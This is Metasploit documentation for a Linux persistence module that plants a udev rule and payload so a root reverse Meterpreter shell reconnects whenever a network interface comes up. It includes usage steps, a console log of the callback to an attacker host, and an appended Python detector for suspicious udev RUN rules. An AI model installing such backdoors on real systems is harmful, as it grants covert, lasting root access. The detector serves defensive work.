metasploit-gs/documentation/modules/exploit/linux/local/udev_persistence.md
2025-07-17 09:53:40 +01:00

This is a post module that performs a persistence installation on a Linux system using udev. The persistence execution will be triggered with root privileges every time a network interface other than lo comes up.

Verification Steps

  1. Start msfconsole
  2. Obtain a session on the target machine
  3. use exploit/linux/local/udev_persistence
  4. set session -1
  5. exploit

Module usage

msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use exploit/linux/local/udev_persistence
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/local/udev_persistence) > set session -1
session => -1
msf exploit(linux/local/udev_persistence) > exploit

[*] /usr/bin/udev-check-updates written
[*] /lib/udev/rules.d/99-update.rules written
msf exploit(linux/local/udev_persistence) > 
[*] Sending stage (3045380 bytes) to 172.18.49.39
[*] Meterpreter session 2 opened (172.18.52.45:4444 -> 172.18.49.39:41848) at 2024-09-13 03:59:47 -0400
msf exploit(linux/local/udev_persistence) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter > 

Options

BACKDOOR_PATH

Specify the path of the file containing the udev rules. (Default: /lib/udev/rules.d/99-update.rules)

PAYLOAD_PATH

Specify the name of the payload to execute upon persistence. (Default: /usr/bin/udev-check-updates)
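
A defender-side check for the artifacts described above, as an added example that is not part of the module or its documentation: it parses udev rules and reports `RUN` directives that start an absolute-path program outside udev's own helper directories. The allowlist, the function names and the sample rules are assumptions constructed for illustration; the first sample rule is modelled on the description above, not copied from the module.

```python
import re
from pathlib import Path

# KEY[{attr}] OP "value", e.g. SUBSYSTEM=="net" or RUN+="/bin/x"
TOKEN = re.compile(r'([A-Za-z_]+(?:\{[^}]*\})?)\s*(==|!=|\+=|-=|:=|=)\s*"((?:[^"\\]|\\.)*)"')
# Assumption: local allowlist of directories that legitimately hold udev helpers.
TRUSTED_DIRS = ("/usr/lib/udev/", "/lib/udev/", "/usr/lib/systemd/", "/lib/systemd/")
RULE_DIRS = ("/etc/udev/rules.d", "/run/udev/rules.d", "/usr/lib/udev/rules.d", "/lib/udev/rules.d")

def logical_lines(text):
    """Yield rules with backslash continuations joined; skip blanks and comments."""
    buf = ""
    for line in map(str.strip, text.splitlines()):
        if not buf and (not line or line.startswith("#")):
            continue
        if line.endswith("\\"):
            buf += line[:-1] + " "
        else:
            yield buf + line
            buf = ""

def audit_rules(text, source="<inline>"):
    """Return RUN directives that start an absolute-path program outside TRUSTED_DIRS."""
    findings = []
    for rule in logical_lines(text):
        tokens = TOKEN.findall(rule)
        net = any(k == "SUBSYSTEM" and op == "==" and v == "net" for k, op, v in tokens)
        for key, op, value in tokens:
            if op in ("==", "!=") or key not in ("RUN", "RUN{program}") or not value.split():
                continue  # match keys, builtins and empty values start no program
            program = value.split()[0]
            # Relative names are resolved inside udev's own helper directory.
            if program.startswith("/") and not program.startswith(TRUSTED_DIRS):
                findings.append({"source": source, "program": program,
                                 "net_trigger": net, "rule": rule})
    return findings

# Constructed sample rules; the first is modelled on the behaviour described above.
SAMPLE = r'''
SUBSYSTEM=="net", KERNEL!="lo", \
  RUN+="/usr/bin/udev-check-updates"
ACTION=="add", SUBSYSTEM=="block", RUN+="helper-tool --export $devnode"
ACTION=="add", SUBSYSTEM=="usb", RUN{builtin}+="kmod load"
'''

if __name__ == "__main__":
    for path in sorted(p for d in RULE_DIRS for p in Path(d).glob("*.rules")):
        for f in audit_rules(path.read_text(errors="replace"), str(path)):
            print(f"{f['source']}: RUN {f['program']} (net trigger: {f['net_trigger']})")
```

A hit is a lead rather than a verdict, since packaged rules also run programs from `/usr/bin`; follow up by checking whether the rules file and the program belong to an installed package (for example with `dpkg -S` or `rpm -qf`).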